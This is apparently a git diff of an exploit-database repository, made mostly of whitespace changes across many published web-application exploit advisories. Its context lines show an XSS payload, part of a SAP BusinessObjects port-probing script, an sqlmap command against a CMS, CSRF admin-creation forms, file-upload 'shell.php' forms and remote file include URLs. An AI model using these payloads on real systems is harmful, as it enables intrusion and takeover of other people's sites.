 Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
 Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
 Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
 Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
-  
+  
-  
+  
 [Arbitrary File Upload]
 
 You can upload any file you want by bypasss extesion wing headers, if

exploits/multiple/webapps/43123.txt

@@ -1,18 +1,18 @@
-# Exploit Title: Logitech Media Server : HTML code injection and execution.
+# Exploit Title: Logitech Media Server : HTML code injection and execution.
-# Shodan Dork: Search Logitech Media Server
+# Shodan Dork: Search Logitech Media Server
-# Date: 11/03/2017
+# Date: 11/03/2017
-# Exploit Author: Dewank Pant
+# Exploit Author: Dewank Pant
-# Vendor Homepage: www.logitech.com
+# Vendor Homepage: www.logitech.com
-# Version: 7.9.0
+# Version: 7.9.0
-# Tested on: Windows 10, Linux
+# Tested on: Windows 10, Linux
-# CVE : Applied For.
+# CVE : Applied For.
- 
+ 
- 
+ 
- 
+ 
 POC:
- 
+ 
-1. Access and go to the Radio URL tab and add a new URL.
+1. Access and go to the Radio URL tab and add a new URL.
-2. Add script as the value of the field.
+2. Add script as the value of the field.
-3. Payload : <script> alert(1)</script>
+3. Payload : <script> alert(1)</script>
-4. Script saved and gives an image msg with a javascript execution on image click.
+4. Script saved and gives an image msg with a javascript execution on image click.
-5. Therefore, Persistent XSS.
+5. Therefore, Persistent XSS.

exploits/multiple/webapps/43404.py

@@ -19,8 +19,8 @@ import sys
 
 if len(sys.argv) != 4:
 
-   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
+   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
-   sys.exit(1)
+   sys.exit(1)
 
 url = sys.argv[1]
 targetIP = sys.argv[2]
@@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
 
 try:
 
-   request = urllib2.Request(url, headers=headers)
+   request = urllib2.Request(url, headers=headers)
-   page = urllib2.urlopen(request, context=gcontext)
+   page = urllib2.urlopen(request, context=gcontext)
-   print "[*] Connected to SAP Bussiness Object %s"  %url
+   print "[*] Connected to SAP Bussiness Object %s"  %url
 
 except:
 
-   print "[-] Failed To connect to SAP Bussiness Object %s" %url
+   print "[-] Failed To connect to SAP Bussiness Object %s" %url
-   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
+   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
-   sys.exit(2)
+   sys.exit(2)
 
  
 resheaders = page.info()
@@ -50,50 +50,50 @@ content = page.readlines()
 
 for line in content:
 
-   if "com.sun.faces.VIEW" in line:
+   if "com.sun.faces.VIEW" in line:
-      sfview = line.split("=")[4].split("\"")[1]
+      sfview = line.split("=")[4].split("\"")[1]
-      print "[*] Got java faces dynamic value"
+      print "[*] Got java faces dynamic value"
 
-   else:
+   else:
-      continue
+      continue
 
 if not sfview:
 
-   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
+   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
-   sys.exit(3)
+   sys.exit(3)
 
 
 formdata = {"_id0:logon:CMS":targetHostIP,
-         "_id0:logon:USERNAME":"",
+         "_id0:logon:USERNAME":"",
-         "_id0:logon:PASSWORD":"",
+         "_id0:logon:PASSWORD":"",
-         "com.sun.faces.VIEW":sfview,
+         "com.sun.faces.VIEW":sfview,
-         "_id0":"_id0"
+         "_id0":"_id0"
-         }
+         }
 
  
 
 data_encode = urllib.urlencode(formdata)
-start =  datetime.now()
+start =  datetime.now()
-print "[*] Testing Timing Attack %s" %start        
+print "[*] Testing Timing Attack %s" %start        
 request = urllib2.Request(url,data_encode)
 request.add_header('Cookie', cookie)
-response  = urllib2.urlopen(request)
+response  = urllib2.urlopen(request)
 end = datetime.now()
 the_page = response.read()
 
 
 if "FWM" in the_page:
  
-   elapsedTime = end-start
+   elapsedTime = end-start
-   if elapsedTime.total_seconds() >= 10:
+   if elapsedTime.total_seconds() >= 10:
 
-      print "[*] Port %s is Open, Gotcha !!! " %targetPort
+      print "[*] Port %s is Open, Gotcha !!! " %targetPort
 
-   else:
+   else:
 
-      print "[*] Port %s is Closed , we die fast"  %targetPort
+      print "[*] Port %s is Closed , we die fast"  %targetPort
 
 elif "FWC" in the_page:
 
-   print "[-] error login expired"
+   print "[-] error login expired"
-   sys.exit(10)
+   sys.exit(10)

exploits/multiple/webapps/49372.txt

@@ -7,8 +7,8 @@
 # Tested on: BackBox Linux
 # CVE : CVE-2021-3018
 
-Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
+Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
-Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
+Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
 Parameter: id (GET based)
 Use SQLmap if you've found the valid id...
 e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs

exploits/php/webapps/11127.txt

@@ -18,7 +18,7 @@
 <input type="password" name="newpass2" size="40" maxlength="20" /></td>
 <input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
 <input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
-<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
+<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
 <input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
 <input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
 <input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />

exploits/php/webapps/1140.php

@@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii]));
 if ($ji==16) {
              $ji=0;
              $ci++;
-             echo "<td>  </td>";
+             echo "<td>  </td>";
              for ($li=0; $li<=15; $li++)
                       { echo "<td>".$headeri[$li+$ki]."</td>";
 			    }
@@ -86,7 +86,7 @@ $ii++;
 $ji++;
 }
 for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
-                      { echo "<td>  </td>";
+                      { echo "<td>  </td>";
                        }
 
 for ($li=$ci*16; $li<=strlen($headeri); $li++)

exploits/php/webapps/11593.txt

@@ -11,11 +11,11 @@
 #
 # if(empty($admin_name))
 # {
-# $errorMessage=warning." Username is empty!";
+# $errorMessage=warning." Username is empty!";
 # }
 # elseif(empty($admin_password))
 # {
-# $errorMessage=warning." Password is empty!";
+# $errorMessage=warning." Password is empty!";
 # }
 # 
 # 

exploits/php/webapps/11883.txt

@@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
 
 <title>WebSiteBaker 2.8.1 DataBase Backup</title>
 
-  <p align="center"> </p>
+  <p align="center"> </p>
         <p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
         DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
         <p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
@@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
         <a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
         <p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
 
-        <p align="center"> </p>
+        <p align="center"> </p>
 
 <body bgcolor="#000000">
 
@@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl
  <input type="submit" name="backup" value="Backup Database" />
         </font></p>
 </form>
-<p align="center"> </p>
+<p align="center"> </p>
 <p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
-Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
+Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
 <p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
 
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

exploits/php/webapps/12031.html

@@ -34,7 +34,7 @@ My home : Sec-war.com
         </thead>
         <tr vAlign="top">
             <td class="optiontitle" colSpan="2">
-            <p align="center"> </td>
+            <p align="center"> </td>
         </tr>
         <tbody id="tbody_bbtitle">
             <tr vAlign="top">
@@ -50,7 +50,7 @@ My home : Sec-war.com
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -59,13 +59,13 @@ My home : Sec-war.com
                 <p align="center">PASS must me*</td>
                 <td class="alt1" width="52%">
                 <p align="center">
-                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
+                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
                 </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -76,12 +76,12 @@ My home : Sec-war.com
                 </td>
                 <td class="alt1" width="52%">
                 <p align="center">
-                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
+                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
                 </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
-                 </td>
+                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
             <tr vAlign="top">
@@ -97,12 +97,12 @@ My home : Sec-war.com
                 <option>--   --</option>
                 <option value="MA"> </option>
                 <option value="EG" selected></option>
-                </select> <span lang="fr">  </span></td>
+                </select> <span lang="fr">  </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -119,12 +119,12 @@ My home : Sec-war.com
                 <option value="3"></option>
                 <option value="2"></option>
                 <option value="1"></option>
-                </select> <span lang="fr">  </span></td>
+                </select> <span lang="fr">  </span></td>
             </tr>
             <tbody id="tbody_bbtitle">
             <tr>
                 <td class="tfoot" align="middle" colSpan="2">
-                <input class="button" id="submit" type="submit" value="ok add  "> 
+                <input class="button" id="submit" type="submit" value="ok add  "> 
                 </td>
             </tr>
     </table>

exploits/php/webapps/12045.html

@@ -50,7 +50,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 

exploits/php/webapps/12047.html

@@ -58,7 +58,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 

exploits/php/webapps/12049.html

@@ -39,7 +39,7 @@
   	or
   	</font>
   	<font face="Tahoma" size="2" color="#000000">http://victim</font><font 
-size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
+size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
 size="2" face="Tahoma">
   	<input type="text" name="victim" size="20";"></p>
 <center>
@@ -49,7 +49,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 

exploits/php/webapps/12322.txt

@@ -42,7 +42,7 @@
   <tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
   <tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
   <tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
-  <tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
+  <tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
   </table></form>
   </html>
 

exploits/php/webapps/12496.html

@@ -13,8 +13,8 @@
  <form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
         <table width="70%" cellpadding="0" cellspacing="2" border="0">
           <tr>
-            <td width="35%"> </td>
+            <td width="35%"> </td>
-            <td width="65%"> </td>
+            <td width="65%"> </td>
 
           </tr>
           <tr>
@@ -40,15 +40,15 @@
 
           </tr>
           <tr>
-            <td> </td>
+            <td> </td>
-            <td> </td>
+            <td> </td>
           </tr>
           <tr>
             <td></td>
             <td height="30" style="padding-left:6px;">
             <input name="Submit" type="submit" class="button" value="Submit">
 
-             
+             
             <input name="Reset" type="reset" class="button" value="Reset">
             </td>
           </tr>

exploits/php/webapps/12563.txt

@@ -57,7 +57,7 @@ _____________________________________________________________
 <input name="ok" type="submit" class="button" id="ok" value="OK">
 </p>
 <p align="center">(only gif png jpg are allowed) </p>
-<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
+<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
 </form>
 </html>
 

exploits/php/webapps/12857.txt

@@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&
 
 FILE NAME:<br> 
 
-<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
+<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
 
 <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
 

exploits/php/webapps/1367.php

@@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii]));
 if ($ji==16) {
              $ji=0;
              $ci++;
-             echo "<td>  </td>";
+             echo "<td>  </td>";
              for ($li=0; $li<=15; $li++)
                       { echo "<td>".$headeri[$li+$ki]."</td>";
 			    }
@@ -103,7 +103,7 @@ $ii++;
 $ji++;
 }
 for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
-                      { echo "<td>  </td>";
+                      { echo "<td>  </td>";
                        }
 
 for ($li=$ci*16; $li<=strlen($headeri); $li++)

exploits/php/webapps/13785.txt

@@ -1,23 +1,23 @@
-        =======================================
+        =======================================
-          eLMS Pro SQLi and XSS Vulnerability
+          eLMS Pro SQLi and XSS Vulnerability
-        =======================================
+        =======================================
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
-0     _                   __           __       __                     1
+0     _                   __           __       __                     1
-1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
-0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
-1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
-0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
-1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
-0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
-1                  \ \____/ >> Exploit database separated by exploit   0
+1                  \ \____/ >> Exploit database separated by exploit   0
-0                   \/___/          type (local, remote, DoS, etc.)    1
+0                   \/___/          type (local, remote, DoS, etc.)    1
-1                                                                      1
+1                                                                      1
-0  [+] Site            : Inj3ct0r.com                                  0
+0  [+] Site            : Inj3ct0r.com                                  0
-1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
-0                                                                      0
+0                                                                      0
-1               ##########################################             1
+1               ##########################################             1
-0               I'm Sid3^effects member from Inj3ct0r Team             1
+0               I'm Sid3^effects member from Inj3ct0r Team             1
-1               ##########################################             0
+1               ##########################################             0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
 Name : eLMS Pro SQLi and XSS Vulnerability
@@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels.
 
 Xploit: SQLi Vulnerability
 
-DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
+DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
 
 ###############################################################################################################
 Xploit: XSS Vulnerability
 
-  Attack Pattern: '"-->
+  Attack Pattern: '"-->
 
-  http://[site]/subscribe.php?course_id=[XSS]
+  http://[site]/subscribe.php?course_id=[XSS]
 
 
 ###############################################################################################################

exploits/php/webapps/13786.txt

@@ -1,23 +1,23 @@
-        =======================================
+        =======================================
-          PGAUTOPro SQLi and XSS Vulnerability
+          PGAUTOPro SQLi and XSS Vulnerability
-        =======================================
+        =======================================
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
-0     _                   __           __       __                     1
+0     _                   __           __       __                     1
-1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
-0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
-1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
-0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
-1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
-0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
-1                  \ \____/ >> Exploit database separated by exploit   0
+1                  \ \____/ >> Exploit database separated by exploit   0
-0                   \/___/          type (local, remote, DoS, etc.)    1
+0                   \/___/          type (local, remote, DoS, etc.)    1
-1                                                                      1
+1                                                                      1
-0  [+] Site            : Inj3ct0r.com                                  0
+0  [+] Site            : Inj3ct0r.com                                  0
-1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
-0                                                                      0
+0                                                                      0
-1               ##########################################             1
+1               ##########################################             1
-0               I'm Sid3^effects member from Inj3ct0r Team             1
+0               I'm Sid3^effects member from Inj3ct0r Team             1
-1               ##########################################             0
+1               ##########################################             0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
 Name : PGAUTOPro SQLi and XSS Vulnerability
@@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit
 
 Xploit: SQLi Vulnerability
 
-DEMO  
+DEMO  
 
 URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
 
@@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi]
 ###############################################################################################################
 Xploit: XSS Vulnerability
 
-  Attack Pattern: '"-->
+  Attack Pattern: '"-->
 
-  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
+  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
 
 
 ###############################################################################################################

exploits/php/webapps/13892.txt

@@ -1,12 +1,12 @@
 Name : PHPAuctionSystem Upload Vulnerability
 Date : june, 16 2010
 Vendor url :http://www.phpauctions.info/
-Critical Level     : HIGH
+Critical Level     : HIGH
 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
 special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
 greetz to :All ICW members and my friends :) luv y0 guyz 
 #######################################################################################################
- 
+ 
 
 PHPAuctionSystem had various vulnerablities which was found 
 
@@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found
 
 Xploit:Upload Vulnerability
 
- Step 1: register as a user :)
+ Step 1: register as a user :)
- 
- Step 2: goto "sell an item" option
  
- DEMO URL :http://[site]/select_category.php?
+ Step 2: goto "sell an item" option
 
- Step 3: post ur evil-code in the item description 
+ DEMO URL :http://[site]/select_category.php?
 
- Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
+ Step 3: post ur evil-code in the item description 
 
- demo url :http://[site]/sell.php :)
+ Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
+
+ demo url :http://[site]/sell.php :)
 
 
 ###############################################################################################################

exploits/php/webapps/13922.txt

@@ -1,6 +1,6 @@
 Date : june, 18 2010
 Vendor url :http://www.axxis.gr/
-Critical Level     : HIGH
+Critical Level     : HIGH
 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
 special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
 greetz to :All ICW members and my friends :) luv y0 guyz 
@@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability
 Step 1 : As always register as a user :P
 
 Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
-  
+  
-         INsert your evil XSS script or xss shell ;) and voila 
+         INsert your evil XSS script or xss shell ;) and voila 
 
 DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
 

exploits/php/webapps/13938.html

@@ -39,7 +39,7 @@ HackTalk Security
 
 </tr>
 <tr style="display:none;">
-<td> </td>
+<td> </td>
 <td style="font-size: 10px;">
 Please note: You should only enter values in the above fields if you wish to change this users password
 </td>
@@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha
 </tr>
 <tr>
 
-<td> </td>
+<td> </td>
 <td>
 <input type="radio" name="active[]" id="active" value="1" checked="checked" />
 <label for="active">Active</label>
@@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
 </tr>
 
 <tr>
-<td> </td>
+<td> </td>
 <td>
 <input type="submit" name="submit" value="Add" />
 <input type="reset" name="reset" value="Reset" />

exploits/php/webapps/13999.html

@@ -87,7 +87,7 @@ return(true);
 <INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
 <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
   </TD></TR>
-  <TR><TD> </TD></TR>
+  <TR><TD> </TD></TR>
   <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
 <TR><TD>NOTE: Please be patient, you will not receive any notification until the 
 file is completely transferred.<BR><BR></TD></TR>

exploits/php/webapps/14147.txt

@@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for
 categories, plugins, languages, and themes."
 
 # Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
-        - Mail: security[AT]adeo.com.tr
+        - Mail: security[AT]adeo.com.tr
-        - Web: http://security.adeo.com.tr
+        - Web: http://security.adeo.com.tr
 
 # Vulnerability:
 If administrator of the board browse PoC attacker can gain privilege

exploits/php/webapps/14415.html

@@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload
 
 FILE NAME:<br> 
 
-<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
+<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
 
 <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
 

exploits/php/webapps/14439.txt

@@ -2,33 +2,33 @@
 phpBazar admin information discloser Vulnerability
 =====================================
 
-Author                 :: Net_Spy
+Author                 :: Net_Spy
-Group                  :: Aras cyber Army
+Group                  :: Aras cyber Army
-Email                  :: tvc82_2002@yahoo.com
+Email                  :: tvc82_2002@yahoo.com
-Discover               :: 1 july 2010
+Discover               :: 1 july 2010
-Critical Lvl           :: M
+Critical Lvl           :: M
-Published              :: 22 july 2010
+Published              :: 22 july 2010
-Vendor                 :: http://www.smartisoft.com/
+Vendor                 :: http://www.smartisoft.com/
 ---------------------------------------------------------------------------
 ~~~~~~~~~
 
-Dork                   :: intitle: phpBazar-AdminPanel
+Dork                   :: intitle: phpBazar-AdminPanel
 
 ~~~~~~~~~~~~~~~~~~
 
-demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
+demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
-                         
+                         
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~
 
-Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
+Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
-             
+             
-              
+              
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 +++++++++++++++++++++++++++++++++++++++
 [!] greetiz to ::
-    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
+    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
-    All aras cyber amry members
+    All aras cyber amry members
-   
+   
 +++++++++++++++++++++++++++++++++++++++

exploits/php/webapps/14459.txt

@@ -33,8 +33,8 @@ Detail :
 						$title = $lang['saved_search'];
 					}
 					$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
-					($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
+					($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
-					   <div class="note"><a href="index.php?action=delete_search&
+					   <div class="note"><a href="index.php?action=delete_search&
 					searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '" 
 					onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';
 

exploits/php/webapps/14639.txt

@@ -1,12 +1,12 @@
 # Exploit Title: [MailForm Remote File Include ] 
 # Date: [14-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip] 
 # Version: [v 1.2 ] 
 # Tested on: [Windows XP] 
 # CVE : [هكر المسيب] 
-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

exploits/php/webapps/14712.txt

@@ -1,12 +1,12 @@
 # Exploit Title: [4images1.7.8 Remote File Include ] 
 # Date: [23-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://www.4homepages.de/4images/download.php] 
 # Version: [v 1.7.8 ] 
 # Tested on: [Windows XP] 
 # CVE : 
-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

exploits/php/webapps/14799.txt

@@ -1,12 +1,12 @@
 # Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ] 
 # Date: [26-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://www.oscommerce.com/solutions/downloads] 
 # Version: [v 3.0 ] 
 # Tested on: [Windows XP] 
 # CVE :
